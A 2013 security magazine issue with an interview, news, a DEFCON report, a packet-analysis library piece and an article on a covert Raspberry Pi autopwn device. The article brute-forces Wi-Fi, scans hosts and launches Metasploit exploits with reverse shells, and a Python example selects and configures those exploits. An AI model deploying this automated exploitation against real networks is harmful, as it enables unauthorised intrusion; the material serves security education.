Security Kaizen Magazine, Issue 11


The Security Kaizen Magazine provides information on industry advancements and professional development to those working in the cyber security domain, who in turn educate their partners about issues and trends in the industry. Issue 11 includes an interview with Chris Evans, A Portable Penetration Testing Kit, Packetyzer (a packet analysis library), security news, an ISO/IEC 27001:2013 overview, and more.
Page 1: Security Kaizen Magazine, Issue 11

Vol. 3, Issue 11, Oct./Dec. 2013

www.bluekaizen.org

www.sklabs.org

You don't have to travel to Black Hat Las Vegas to attend the Samurai Web Hacking Course. Justin Searle will visit the Middle East this November to deliver his famous course in Cairo and Dubai.

Now!

Assessing and Exploiting Web Apps with SamuraiWTF

Cairo, Egypt: November 18th - 21st
Dubai, UAE: November 25th - 28th


For advertisement in Security Kaizen Magazine and the www.bluekaizen.org website, mail: [email protected] or phone: +2 0100 267 5570

Security Kaizen is issued every 3 months.

Reproduction in whole or part without written permission is strictly prohibited. All copyrights are preserved to www.bluekaizen.org.

Chairman & Editor-in-Chief: Moataz Salah
Editors: Anwar Mohamed, Amr Thabet, Mohab Ali, Adham Mohamed, Amgad Magdy, Ahmed Riad, Alex Rice
Website Development: Mariam Samy
Marketing Coordinators: Mahitab Ahmed, Mohamed Saeed
Proofreading: Jeff Compton
Designed & Printed: Medhat A. Elbaky, 01013126152

Contents

Grey Hat: Utilization of hardware in hacking nowadays is prominent in various fields. It adds new power in the form of mobility and exposes unknown implementations of various attacks.

User to User: It's very basic for a security pentester or security engineer to have a solid understanding of computer networking fundamentals.

Book Review: ... is written by Mario Heiderich, Eduardo Alberto, Gareth Heyes and David Lindsay.

Best Practice: More than ever, people are using their mobile device as their primary means of accessing the Internet.

Best Practice: In this article I will provide an overview of the new Information Security Management System standard, ISO/IEC 27001:2013, published only a few days earlier.

Editor's Note: As we are slowly leaving 2013, a long year as it seems, we will be releasing our last issue of Security Kaizen magazine as we know it.

Interview: I also keep an eye on Google's Vulnerability Reward Programs. I find it very rewarding to be able to engage and reward the wider security community.

New & News: It was my first time at the most famous hackers' conference, DEFCON. Hackers from all over the world, sharing information and new hacking techniques.

Editor's Note

Last Issue

As we are slowly leaving 2013, a long year as it seems, we will be releasing our last issue of Security Kaizen magazine as we know it.

Welcoming a new year is a chance to open up to new possibilities and opportunities. It is an opening for a fresh start, new ideas, and new goals.

For that, as a new year resolution, I've decided to infuse new blood into our magazine: someone with a more outgoing view who can help boost creativity and change the overall view of the magazine. Starting from 2014, Adham Mohamed will be part of our team as the new editor of Security Kaizen magazine.

Best of luck to Adham; I'm sure he will do great work. P.S.: This issue was prepared in cooperation between Adham and me.

The good news is that Security Kaizen magazine will be released more often: instead of issuing it quarterly, we will have an issue every couple of months. We will also focus on providing our Gold Members with more benefits, and we are forming partnerships with different entities to be able to provide them with a unique service.

Our Gold Members will also get more privileges in 2014. In addition to the 2013 exclusive benefits (renting books from the BK library, receiving SK magazine at your address, and discounts for training centers and Bluekaizen events), in 2014 members will have a chance for a free yearly subscription to the magazine, which is originally worth 220 USD.

To know more about the membership program, please contact us at [email protected]

Last but not least, Cairo Security Camp registration is now open. Please take some time to check our new website, www.cairosecuritycamp.com. I am excited to meet all our beloved members and readers this November at CSCAMP2013.

The First Online Recruitment Portal for Information Security Jobs in the Middle East

Grey Hat

A Portable Penetration Testing Kit

Adham Mohamed, Security Researcher

Utilization of hardware in hacking nowadays is prominent in various fields. It adds new power in the form of mobility and exposes unknown implementations of various attacks. For a long time, hardware hacking was restricted to engineers who understood the hardware they were working on, so they could modify it to expand its usage in an unusual way. Nowadays there are many kits sold off the shelf that enable programmers with limited knowledge of hardware to make their own projects by adding parts to the kit, composing their system and programming it using Python, C# or any high-level language, without direct knowledge of the underlying hardware.

In order to be a good hardware hacker you should have enough knowledge of electronics and, of course, circuits. Electronics engineers usually have these abilities, but it is a skill that matures with experience. While you can build a hardware keylogger on a Raspberry Pi, which has dimensions of about 85.60 mm × 53.98 mm, a skillful hardware engineer can build one in about 4 cm × 1 cm using a PCB (Printed Circuit Board), a microcontroller and a few other parts. The size can be reduced further, to roughly 1 cm × 1 cm, if surface-mount components (small components that are hard to solder at home and are usually placed at a factory) are used.

When you talk to people about hardware hacking you'll hear some keywords based on their perspective, like the hardware keylogger (a dongle attached to the PS/2 or USB keyboard cable to store keystrokes), hacking the PlayStation, overclocking, Bitcoin mining machines, emulated hardware dongles (for software that requires a dongle for license verification), signal jammers and many more.

In this article we'll discuss one of the projects I made using the Raspberry Pi as a mobile (portable) penetration testing device. It introduces the idea of down-scaling projects to fit a covert form factor, and non-engineers will find it easy while expanding their view of programming.

Raspberry Pi [1] is a single-board computer about the size of a wallet. You can check its full specs from various online sources, and it ships nearly everywhere. What you need to know is that it runs a 700 MHz ARM processor that can be overclocked to reach 1 GHz; there are two models, and model B rev 2 features 512 MB of memory and can run Linux/Unix OSes capable of working on the ARM architecture from an attached SD card. Special penetration testing distros have been made available for this platform, like PwnPi, Kali and Raspberry Pwn. It can run Raspbian, Fedora, Arch Linux, NetBSD and others. It's worth mentioning that the kit has 2 USB ports, an RJ45 socket, HDMI, micro-USB for power input, analog audio output and an RCA connector for old TVs. It also includes GPIO pins to interface with external hardware, all of that for $35. Let the hacking begin!

Raspberry Pi: a credit-card-sized computer board that has plenty of features for $35 and runs Unix/Linux.

The idea for the project came to me from the concept of wardriving (identifying the state of Wi-Fi access points across a region and pinpointing them on a map). Wardriving has special hardware requirements but can be done using a laptop with a good wireless NIC. You can implement it on the Raspberry Pi by attaching an external Wi-Fi dongle with a high-gain antenna and a good power supply. Put it in your bag, keep walking and map the entire area, which I plan on doing soon.

So instead of just logging the state of public Wi-Fi networks, why not make a platform that is capable of performing automatic penetration testing on connected devices and producing a report? Of course you shouldn't violate privacy laws and go rogue on people's networks without permission. This is a proof of concept; you can face serious charges if you try this on the public in general.

This project was created so that you can perform automated penetration tests, either by connecting to a DSL router by cable or simply by wireless means using the wireless NIC attached to the Raspberry Pi. Some control was needed over the device. To keep it totally hidden and away from any suspicion you can use your mobile phone to control the Raspberry Pi over Bluetooth; you'll have to add a Bluetooth dongle to the kit. You have plenty of other options for connectivity, as you can attach an LCD and buttons, or an RF transmitter and receiver, but you'll have to get an Arduino kit to interface with the Android mobile, which is a hassle, so let's keep it simple.

For a use case scenario, let's imagine you have the device in your backpack and you're walking in the street or in a target entity. It detects an open access point, then it tries to get associated, or tries to brute-force the access point credentials using a dictionary list. Once it gets associated it scans for hosts using a simple Nmap scan to discover online hosts and their OS, and then sends the data to your mobile, where an application is installed and paired over Bluetooth with the device. When you open the mobile application you'll find the list of the online IPs and their OS. Through the application you can command the Raspberry Pi to find more info, try to autopwn the target or do a custom scan.

There are not many issues in getting associated to a network, doing a simple Nmap scan, parsing the result and sending it over Bluetooth, but it's a bit challenging when you're trying to autopwn. I'm using Metasploit Framework v4 and the old autopwn (db_autopwn.rb), which is no longer shipped as it was found to follow a bad methodology for profiling the exploits to be launched. I used the Metasploit API, which integrates with Python's msfrpc module, to list the exploit information and apply the necessary filters, launch the exploits at the target, then listen for any connections and report them. Now, as you see, it's more about programming and less about hardware, which enables many skillful hackers to abuse the exposure that mobility gives to a terrifying extent. Don't forget that the speed will definitely vary, as you're using far fewer resources than those available on a PC or a laptop.

Now for the network SSID sniffing, there's a simple 10-line script at SecurityTube [2] that scans for SSIDs. With a slight modification you can try associating to each and trying the passwords. At this point you have made an advanced passive wardriving scanner.

After you get associated you'll run a simple Nmap scan and parse the results to get the online PCs with their OS info. After getting a request from the mobile phone to start autopwning the target, an exploit search starts, based on the Nmap scan results compared with the exploit database created from Metasploit earlier. Python uses msfrpc [3] to communicate with Metasploit. [Figure: sample code for the MSF API connection]

In case you're asking about the exploit database: I used Python with the MSF API to list all available exploits and their required parameters in a MySQL database. This phase is launched after an update is run against Metasploit to refresh the exploit information. [Figure: snapshot of the code that copies all the Metasploit exploit information into a Python array of exploit structures]

The exploits are launched with a reverse shell payload and the final results are saved to an HTML file indicating vulnerable hosts; a simple log is sent to the mobile. I don't have enough space to talk about the mobile part, but maybe I'll cover it in a future article. It's useful to note that this entire project can be totally automated and needs no human intervention, as it will simply try to exploit any reachable device and log information.

Hardware usage in hacking is limitless and the applications are endless. We'll try to keep you updated with more projects in coming issues.
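The exploit-selection step described above (Nmap results compared against the exploit information pulled from Metasploit, then launched with a reverse shell payload), as an added Python example; this is not the author's code from the article. It parses a constructed Nmap XML report, matches each open service against a small constructed catalog carrying the same fields the article stores (module name, rank, required options, payload), and assembles the option dictionary that Metasploit's module.execute would receive over msfrpc. The RPC call itself is omitted so the example runs offline; the catalog's module names are real Metasploit modules, but its field layout and the function names are this example's own.

```python
"""Added example: choose exploits from Nmap output and build msfrpc module.execute options.
The Nmap XML and the exploit catalog are constructed for this example."""
import xml.etree.ElementTree as ET

# Constructed Nmap -oX output: one Windows XP host, one Linux host, one host that is down.
NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -O -oX - 192.168.1.0/24">
  <host><status state="up"/><address addr="192.168.1.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows XP SP3" accuracy="98"/></os>
  </host>
  <host><status state="up"/><address addr="192.168.1.20" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd"/></port>
      <port protocol="tcp" portid="22"><state state="closed"/><service name="ssh"/></port>
    </ports>
    <os><osmatch name="Linux 2.6.X" accuracy="90"/></os>
  </host>
  <host><status state="down"/><address addr="192.168.1.30" addrtype="ipv4"/></host>
</nmaprun>
"""

# Metasploit ranks, best first; used to launch the most reliable modules before the flaky ones.
RANK_ORDER = {"excellent": 0, "great": 1, "good": 2, "normal": 3, "average": 4, "low": 5, "manual": 6}

# Constructed subset of what the article mines from Metasploit over the RPC API (module.exploits,
# module.options, module.compatible_payloads). Module names are real; the layout is this example's.
EXPLOIT_CATALOG = [
    {"module": "exploit/windows/smb/ms08_067_netapi", "rank": "great", "platform": "windows",
     "ports": {445, 139}, "required": ["RHOST", "RPORT"], "payload": "windows/shell_reverse_tcp"},
    {"module": "exploit/windows/dcerpc/ms03_026_dcom", "rank": "great", "platform": "windows",
     "ports": {135}, "required": ["RHOST", "RPORT"], "payload": "windows/shell_reverse_tcp"},
    {"module": "exploit/unix/ftp/vsftpd_234_backdoor", "rank": "excellent", "platform": "linux",
     "ports": {21}, "required": ["RHOST", "RPORT"], "payload": "cmd/unix/interact"},
]


def parse_nmap(xml_text):
    """Return [{'ip', 'os', 'open_ports': {port: service}}] for every host that is up."""
    hosts = []
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if status is None or status.get("state") != "up" or addr is None:
            continue  # down hosts never reach the exploit stage
        open_ports = {}
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is not None and state.get("state") == "open":
                svc = port.find("service")
                open_ports[int(port.get("portid"))] = svc.get("name", "") if svc is not None else ""
        osmatch = host.find("os/osmatch")
        hosts.append({"ip": addr.get("addr"),
                      "os": osmatch.get("name", "") if osmatch is not None else "",
                      "open_ports": open_ports})
    return hosts


def select_exploits(host, catalog=EXPLOIT_CATALOG):
    """(entry, port) pairs whose default port is open and whose platform matches the OS guess.
    An unknown OS filters nothing out; results are ordered by Metasploit rank, then module name."""
    candidates = []
    for entry in catalog:
        hit_ports = sorted(entry["ports"] & set(host["open_ports"]))
        if not hit_ports:
            continue
        if host["os"] and entry["platform"] not in host["os"].lower():
            continue
        candidates.extend((entry, port) for port in hit_ports)
    candidates.sort(key=lambda c: (RANK_ORDER.get(c[0]["rank"], 99), c[0]["module"]))
    return candidates


def build_jobs(xml_text, lhost, lport=4444, catalog=EXPLOIT_CATALOG):
    """Build the option dicts module.execute('exploit', name, opts) would receive over msfrpc."""
    jobs = []
    for host in parse_nmap(xml_text):
        for entry, port in select_exploits(host, catalog):
            opts = {"RHOST": host["ip"], "RPORT": port, "PAYLOAD": entry["payload"],
                    "LHOST": lhost, "LPORT": lport}
            missing = [k for k in entry["required"] if k not in opts]
            if missing:  # the stored required-option list lets this be caught before launch
                raise ValueError("%s is missing %s" % (entry["module"], missing))
            jobs.append({"module": entry["module"], "options": opts})
    return jobs


if __name__ == "__main__":
    for job in build_jobs(NMAP_XML, lhost="192.168.1.99"):
        print(job["module"], job["options"])
```

The filter is deliberately coarse (default port plus an OS keyword), which is the part of db_autopwn's methodology that drew criticism: a port match is not a version match, so a real run should add the service version from Nmap's `product`/`version` attributes before anything is launched.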

References
[1] Raspberry Pi official site - http://www.raspberrypi.org/
[2] Wi-Fi sniffer in 10 lines of Python - http://hackoftheday.securitytube.net/2013/03/wi-fi-sniffer-in-10-lines-of-python.html
[3] Scripting Metasploit using MSGRPC - http://blog.spiderlabs.com/2012/01/scripting-metasploit-using-msgrpc-.html


User to User

My Story with Packetyzer: Developing a C++ Packet Analysis Library

Anwar Mohamed, Security Researcher

It's very basic for a security pentester or security engineer to have a solid understanding of computer networking fundamentals, so as I was new to these fundamentals I thought it would be a great experience to contribute to the "SRDF Project", where my experience started. Today I am going to tell you the story of pushing my first packet structure class and developing my packet analysis library, "Packetyzer".

The story began when I met a friend, Eng. Amr Thabet, during a session at my college, where he told me about his project and that he was looking for contributors. I was really motivated to contribute, as it would help me gain programming and networking experience; my C++ skills were not strong enough at the time.

Let me tell you about my project. Packetyzer is a high-level library for C++ designed to make the forging and decoding of network packets easier. It has the ability to decode packets of the most common network protocols, capture them and send them on the wire. This capability allows the construction of tools that can probe, scan or attack networks, and enables the creation of networking tools in a few lines.

A packet is described by its protocol layer type, where the fields of each layer have useful default values that you can override. All packets and connection streams are analyzed, from the Ethernet header to the application layer protocols.

Raw packets are represented as an array of the cPacket class, where each packet is analyzed carefully. cPacket is the main packet representation used in Packetyzer.

After my first push I was motivated to continue and enhance this class. Amr guided me, so I started to widen the functionality of the class. Following OOP principles I created other classes like cPcapFile, through which packets are fed to the packet stack from a pcap file, cPacketGen, which generates raw packets, and cWinpcapCapture, which captures network packets. The stack is then analyzed and represented as a traffic structure by the cTraffic class. cTraffic is responsible for analyzing packets of the same session and grouping the related packets by their protocol types into streams, which are composed of IP protocols (cConStream) and non-IP protocols (cARPStream and ICMPStream). cConStream analyzes the TCP and UDP protocols, then the application layer protocols are decoded into their related streams (like cHTTPStream).

The following shows a basic usage of my library: [Figure: basic usage of Packetyzer]

Packetyzer calculates the packet checksum and checks the TTL to detect if the packet is forged. It has the ability to recalculate the checksum and correct it in the actual packet.

I have enhanced cTCPReassembler to reassemble TCP segments and get the data buffer from the reassembled packets.

Over the last month I have been optimizing the memory usage of the library. After inspecting the memory usage while analyzing a pcap file of 10,000 packets with a file size of 93.0 MB, I found that after freeing memory there was about 500 KB of garbage left behind, which is very low compared to other libraries, even Wireshark.

At the end of the day, all I can say is that this was a great experience for me, which opened my mind to other aspects of computer networking and computer security. I am planning to add many more features to Packetyzer:

• Enhancing the TCP reassembler to be more intelligent.
• Implementing IPv6 and IPv6 options decoders.
• Adding a Layered Service Provider class.
• Adding more application layer parsers.
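The checksum check described above, as an added example in Python rather than Packetyzer's own C++ API: it decodes an Ethernet/IPv4/TCP frame, verifies the IPv4 header checksum (the RFC 1071 one's-complement sum over an intact header, checksum field included, comes out to zero), and recomputes it after the header has been altered, which is what "correct it in the actual packet" means. The frame bytes are constructed for this example, and the function names are this example's own, not Packetyzer's.

```python
"""Added example: IPv4 header decode, checksum verification and repair. Not Packetyzer code."""
import struct

ETH_HDR_LEN = 14


def rfc1071_checksum(data):
    """16-bit one's complement of the one's complement sum of 16-bit words (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"  # odd trailing byte is padded with zero
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:  # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def decode_frame(frame):
    """Decode Ethernet + IPv4 (+ TCP ports/flags) and report whether the IP checksum is intact."""
    if len(frame) < ETH_HDR_LEN + 20:
        raise ValueError("frame too short for an IPv4 header")
    eth_type = struct.unpack("!H", frame[12:14])[0]
    if eth_type != 0x0800:
        raise ValueError("not an IPv4 frame: ethertype 0x%04x" % eth_type)
    ip = frame[ETH_HDR_LEN:]
    version, ihl = ip[0] >> 4, (ip[0] & 0x0F) * 4
    if version != 4 or ihl < 20 or len(ip) < ihl:
        raise ValueError("malformed IPv4 header")
    info = {
        "eth_dst": ":".join("%02x" % b for b in frame[0:6]),
        "eth_src": ":".join("%02x" % b for b in frame[6:12]),
        "total_len": struct.unpack("!H", ip[2:4])[0],
        "ttl": ip[8],
        "proto": ip[9],
        "ip_checksum": struct.unpack("!H", ip[10:12])[0],
        "src": ".".join(str(b) for b in ip[12:16]),
        "dst": ".".join(str(b) for b in ip[16:20]),
        # Summing the header with its own checksum field in place yields 0 only if it is intact.
        "checksum_ok": rfc1071_checksum(ip[:ihl]) == 0,
    }
    info["length_ok"] = info["total_len"] == len(ip)
    if info["proto"] == 6 and len(ip) >= ihl + 20:  # TCP: source/destination port and flags
        info["sport"], info["dport"] = struct.unpack("!HH", ip[ihl:ihl + 4])
        info["flags"] = ip[ihl + 13]
    return info


def fix_ip_checksum(frame):
    """Return a copy of the frame with the IPv4 header checksum recomputed over the current header."""
    ip = bytearray(frame[ETH_HDR_LEN:])
    ihl = (ip[0] & 0x0F) * 4
    ip[10:12] = b"\x00\x00"  # the checksum field counts as zero while it is being computed
    ip[10:12] = struct.pack("!H", rfc1071_checksum(bytes(ip[:ihl])))
    return frame[:ETH_HDR_LEN] + bytes(ip)


# Constructed frame: Ethernet, then IPv4 (TTL 64, proto TCP, checksum left zero), then a TCP SYN.
ETH = bytes.fromhex("001122334455" "66778899aabb" "0800")
IP_NO_SUM = bytes.fromhex("4500" "0028" "1c46" "4000" "40" "06" "0000" "c0a80001" "c0a8000a")
TCP_SYN = bytes.fromhex("9c40" "0050" "00000001" "00000000" "50" "02" "ffff" "0000" "0000")
GOOD_FRAME = fix_ip_checksum(ETH + IP_NO_SUM + TCP_SYN)
# Tampered copy: TTL rewritten from 64 to 128 without updating the checksum, as a careless forger would.
TAMPERED_FRAME = GOOD_FRAME[:ETH_HDR_LEN + 8] + b"\x80" + GOOD_FRAME[ETH_HDR_LEN + 9:]

if __name__ == "__main__":
    for name, frame in (("good", GOOD_FRAME), ("tampered", TAMPERED_FRAME),
                        ("repaired", fix_ip_checksum(TAMPERED_FRAME))):
        d = decode_frame(frame)
        print(name, d["src"], "->", d["dst"], "ttl", d["ttl"], "checksum_ok", d["checksum_ok"])
```

Only the IPv4 header is covered here; TCP and UDP checksums also run over a pseudo-header (addresses, protocol, segment length) and the payload, so a library that rewrites addresses has to recompute those too.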

Interview

Interview with Chris Evans

"I work at Google where I founded and built the Google Chrome Security Team."


Can you please introduce yourself to security kaizen readers?

Hi, I’m Chris. I work at Google where I founded and built the Google Chrome Security Team. Previously, I’ve worked on sandboxing technologies, security research, and open source software such as vsftpd.

Can you please give us more details about the nature of your job in Google?

I still spend much of my time on Google Chrome, because I like the product and enjoy the responsibility of looking after our users. I like working out what projects we should undertake to best secure our users, or investigating novel defensive techniques.

What is the future of the Google Native Client (NaCl) plugin in the Chrome project?

I’m personally excited by Native Client because it can be used to increase security. The history of the security industry is plagued by problems with native code, including browser plug-ins. Native Client runs code at pretty much native speed, but inside a couple of layers of sandboxing. There’s already a rich ecosystem of Chrome (and Chrome OS) applications that have Native Client components, such as a high-performance SSH client [link: https://chrome.google.com/webstore/detail/secure-shell/pnhechapfaindjhompbnflcldabbghjo] or the Google Plus photos application [link: https://chrome.google.com/webstore/detail/google%2B-photos/efjnaogkjbogokcnohkmnjdojkikgobo]

Privacy is always an issue when we talk about Google products. Google knows my location, my phone number, my friends, etc. How do you deal with your customers' concern about their privacy, especially after the PRISM case?

Probably the most important thing you can do to protect your privacy is to use secure client software and secure web services. My personal choice for my e-mail is Gmail, accessed via Google Chrome.

State-sponsored attackers frequently go after weaknesses in client software. Your data, wherever you put it, is only as safe as the computer you use to access it.

We've responded to this concern by putting significant effort into securing Google Chrome. It automatically updates itself with security fixes and integrates with Google's Safe Browsing facilities. It deploys strong sandboxing technology and we were very excited to extend our strong sandbox to the Flash plug-in last year [link: http://blog.chromium.org/2012/08/the-road-to-safer-more-stable-and.html].

We also have some pioneering technology in Chrome that validates SSL certificates more carefully. This protection played a big role in the 2011 incident (with regional connections) involving the former Dutch certificate authority, DigiNotar [link: http://en.wikipedia.org/wiki/DigiNotar]. It was Chrome that detected the DigiNotar compromise and Chrome users were automatically protected from the fraudulent certificate when connecting to Gmail.

We’re always pushing ourselves to add more defenses and protections.

Chris Evans: "I also keep an eye on Google's Vulnerability Reward Programs. I find it very rewarding to be able to engage and reward the wider security community. A well-run program is a good way of moving your security ahead of the pack."

What are the different bounty programs that Google provides for security researchers?

We have two well-established bounty programs -- Google Web [link: http://www.google.com/about/appsecurity/reward-program/] and Chromium [link: http://www.chromium.org/Home/chromium-security/vulnerability-rewards-program] -- and one occasional competition, Pwnium. We also sponsor the well known Pwn2Own competition.

Overall, we recently announced that we’ve paid out over $2 million USD to researchers. You can read more here [link: http://googleonlinesecurity.blogspot.com/2013/08/security-rewards-at-google-two.html].

What was the most critical vulnerability discovered in chrome? And what was the highest reward provided by Google?

We’ve received some excellent submissions as part of our Pwnium competition [link: http://blog.chromium.org/2012/02/pwnium-rewards-for-exploits.html]. We’ve paid out $60,000 USD a few times.

Thanks to our reward programs, any serious bugs tend to get safely reported to us, instead of becoming critical and turning up “in the wild”.

What does it take for a person to find bugs in chrome?

Finding security bugs in a browser can be tricky. One strategy that can be effective is to start “fuzzing”, which is the art of throwing malformed input at a product to see if it gets confused. Since we’re open source, other researchers like to read and study modules of Chrome until they understand an area well enough to spot possible bugs. Another tack is to try and get ideas from past security bugs in Chrome, which we publicly document in our open bug tracker.

External submissions of Chrome security bugs are dropping off as it gets harder and harder to find serious issues, but we have recently raised our reward levels to compensate!

After Chrome is exploited in competitions like Pwn2Own, what is your response? Do you get mad because your product got hacked, or happy because a vulnerability was discovered?

We are delighted. There’s no point in running or participating in these competitions unless you get results that you can learn from. In fact, we go out of our way to help researchers compete, engage in sponsorships, and set payout levels such that we’re almost guaranteed to get entries. We get to learn a lot from every valid entry, and often devise general hardening measures to make Chrome more solid overall.

I’d also note that no-one gets “hacked” at these competitions. That’s the whole point -- they are a safe outlet for advanced security research. Having and supporting Pwnium and Pwn2Own is an important reason why we’re not seeing critical Chrome threats in the wild.

What does it take to get hired on the Chrome security team?

Most of our hires are strong engineers who are passionate about security. The engineering background is important as we have a culture of fixing things and implementing defenses, as well as simply finding issues. Being a strong engineer means you can dive into the code and make it better.

What advice and best practices would you give our readers for secure browsing with Google Chrome?

I recommend browsing the web with Google Chrome. Disable (or better, uninstall) unnecessary plug-ins (see chrome://plugins). Chrome helps you keep your plug-ins up to date and warns you before running certain more dangerous plug-ins, but it's still safer to disable unwanted ones. Make sure your underlying operating system is fully patched. Try and avoid downloading and opening anything outside the browser.

If all of this sounds a little bothersome, some Chrome OS laptop models are very inexpensive, and take care of a lot of these security measures automatically.

Geeks Comics, provided by Rawy.me

New & News

News

By Amgad Magdy

1. Android Trojan spreads through mobile

Roman Unuchek, a Kaspersky researcher who blogged about the threat, said that users have been targeted with spam text messages containing malicious links that install another Android Trojan called Opfake. Once the user installs Opfake, the malware's command-and-control server instructs the Trojan to spam out messages to the victim's contacts, directing them to the Trojan Obad.

2. China attacked by biggest-ever DDoS attacks

The China Internet Network Information Center, which announced the attacks on the morning of Sunday 25 August, said the DDoS strikes were most severe between 2 a.m. and 4 a.m. local time on Sunday, "leading to slow or interrupted [internet] access" for users throughout the country.

3. Club Nintendo website hacked

The company said that attackers successfully logged in to its site nearly 24,000 times between June 9 and Thursday, after making more than 15 million attempts to fraudulently access it. The company apologized to its customers.

4. Google bug bounty program hits more than a million dollars

The company offers two programs, one for Google-owned services, such as its flagship Google.com site, and another for the Chromium Project, the open source browser project behind Google Chrome. Combined, more than 2,000 bugs have been reported and fixed. Google's bug bounty program started three years ago.

5. Anonymous attacked leading Azerbaijan energy company

An Armenian branch of the hacker collective Anonymous has leaked 7 GB worth of documents relating to Azerenergy, the leading energy producer in the Eurasian country of Azerbaijan. "We are not that very much happy with Aliev's politics therefore this release is just another leap in a series of releases to fight Azerbaijani mafia clans," the group said. Azerbaijan has not commented so far.

6. Facebook delays its new privacy policy

Now Facebook has announced that it is delaying implementation of the new policy, although in an emailed comment to the LA Times it denied that it would be changing anything. "We are taking the time to ensure that user comments are reviewed and taken into consideration to determine whether further updates are necessary, and we expect to finalize the process in the coming week," Facebook said.

7. BlackBerry, iPhone users attacked with phishing emails

The messages claim that the recipient's "BlackBerry ID" has been created, and that to retrieve it they need to click on an attachment included in the email, according to Websense Security Labs, which detected the threat. Doing so results in the installation of malware. The same problem exists for the iPhone, but there has been no comment from the RIM and Apple security teams.

8. New Apple security upgrades to protect info

According to Apple's research, 50% of smartphone users don't set passcodes on their iPhones, leaving personal information unprotected. Touch ID makes it quick and easy to unlock your phone without one, using a fingerprint scanner. Apple also added iCloud Keychain, which eliminates the need for third-party password managers by creating truly randomized passwords for all your various accounts. Each password is unique, meaning no two accounts will share the same one, adding an extra layer of security even if one site gets hacked. It then stores passwords, account names and credit card information so you can automatically enter them whenever you need to make an online purchase or sign in. The Find My iPhone app lets you control your iPhone remotely if you lose it.

New & News

Hacker's Conference

It was my first time at the most famous hackers' conference, DEFCON. Hackers from all over the world, sharing information and new hacking techniques. This year was special after the PRISM operations by the US government and the Snowden leaks.

The story began with applying to the conference CFP (Call for Papers) to talk about a new tool I created (still not finished) named "Exploitation Detection System (EDS)". I would talk about all the ideas inside it and a new concept alongside firewalls, IDS and IPS, named EDS/EPS (Exploitation Detection and Prevention System). This new type of tool focuses not on the network level but on the memory level. It's designed to detect suspicious memory patterns and memory corruption inside process memory. It's not an antivirus program: it's signatureless and it doesn't detect malware, but it detects exploitation and memory corruption. It's designed mainly to detect APT attacks after the failure of known security tools to detect them.

Even though my tool was not finished, I decided to apply to get some feedback.

At the beginning, the conference accepted many talks, which they released on their website, without replying to me with a yes or no. Later they said there were still a few talks left to be decided upon and the chance of being accepted was approximately 20%. After receiving this message I thought they would refuse my presentation and I lost hope, but I was surprised by their next e-mail saying that I was accepted and now officially a SPEAKER at DEFCON. I didn't believe it at the beginning but it was true: I was a speaker at one of the biggest security conferences in the world, DEFCON.

The first thing you notice at DEFCON is the number of participants in the event. This year there were up to 14,000 security researchers, many of them enjoying their first time.

This year DEFCON included many villages. One of them was Lockpicking; it included the tools, sessions and labs necessary for learning lockpicking and testing your skills. The second village was for contests; it included challenges in reversing, exploitation, etc. I didn't participate, but one of them was on reverse engineering ARM processors, which are not a common target in reversing.

The third village was CTF (capture the flag), which focused on attack and defense challenges where every team has flags and services running. The goal was to attack the other team’s services and capture their flags, which was interesting.

There was also the Tamper Evident Village. There were demonstrations of high-security tamper-evident seals and how to open them without leaving evidence as well as how to sneakily open everything from envelopes to mechanical seals, contests, and take-home kits for practice.

There was also a Wireless Village, created to demonstrate wireless hacking, including talks and labs; their websites are included in the references. Other villages such as the Hardware Hacking Village and the Social Engineering Village were also present. I didn't take part in the Social Engineering Village because I'm sure my HumanOS would be very vulnerable to these guys, but it seemed to have many interesting topics and labs.

Also in DEFCON you’ll notice the famous Wall of Sheep, which is a demonstration of what happens when people log into email, websites, and other services without using encryption. The Wall is meant as a public cautionary tale - and hackers are razzed forever if their name appears on the Wall during the conference.

You will also notice at DEFCON the vendor room, or you could call it the DEFCON market. It includes Hackers for Charity, tools and many vendors selling t-shirts, CDs, lockpicking tools, hacking tools and hacking books. The room was full of products from different vendors and competing products, especially lockpicking tools.

The first day of the conference was dedicated to beginners and newcomers. It consisted of a welcoming panel for all newcomers and the DEFCON Documentary. This year the presentations also included the on-screen words of what the speaker was saying, so if you missed a word or something, you could see it in the script.

The sessions during the first day were about the fundamentals, like the Pentester’s Toolkit, which is what you will have in your bag when you go to a company to perform a pentest. It was a simple presentation of what you will need to do a proper pentest.


The 2nd session was Oil and Gas InfoSec 101, which was about security for oil and gas companies. The speaker didn’t go in depth on the technology part, but he talked about the problem in general concerning the oil and gas lines and the old technologies used at the stations, and so on. He also talked from the managerial level about how to secure it, or at least defend what you can defend.

The 3rd session was about Pentoo, a hacking distribution like BackTrack. It’s based on Gentoo, which is a secure Linux distro, and the talk described the new technologies behind the new release.

The last talk on day one was about wireless hacking. It focused on the fundamentals and basic knowledge of wireless technologies and their hacking techniques, and it introduced the Wireless Village to people.

The remaining days were the advanced level: the sessions became 4 tracks and you had to choose between sessions. I will highlight some of the interesting sessions this year.

One of the interesting sessions this year for me was “Getting The Goods With smbexec”, which talked about a post-exploitation tool named smbexec. It takes advantage of native Windows functionality and SMB authentication to execute commands on remote Windows systems without having to upload a payload. It was a very good tool, and it gathers a lot of information from the infected machine.

Another post-exploitation tool presented this year was “PowerPreter”, which was created using the PowerShell scripting language in Windows. It’s very powerful and modular, and it’s easy to add commands and plugins. After some failed attempts, the presenter tested his tool on his “real” machine, which revealed all of his passwords to the audience, which was crazy.

This year also saw a couple of presentations on IPv6, which caught the interest of many researchers. One of them created a tool for hacking enabled-by-default IPv6 machines called “Fear the Evil FOCA”. In his tool, he uses announcement protocols similar to ARP to spoof the IPv6 machines and redirect them to another gateway and another DNS and reset their proxy settings, which takes control of the Internet communication on the victim machine and steals its credentials. He worked with HTTPS in various ways to do MITM attacks on it, like stripping the “s”, and other ways of hacking. It was a very interesting topic.


